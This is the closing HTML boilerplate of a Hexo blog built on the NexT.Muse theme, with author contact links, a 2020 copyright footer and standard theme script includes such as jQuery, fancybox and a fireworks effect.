        <a href="https://github.com/ambitiousleader/" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ambitiousleader&#x2F;" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/601209387@qq.com" title="E-Mail → 601209387@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/u/6772435317/home?wvr=5&sudaref=graph.qq.com" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;u&#x2F;6772435317&#x2F;home?wvr&#x3D;5&amp;sudaref&#x3D;graph.qq.com" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>Weibo</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Peguin</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













  

  


  
   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/fireworks.js"></script>
  


</body>
</html>
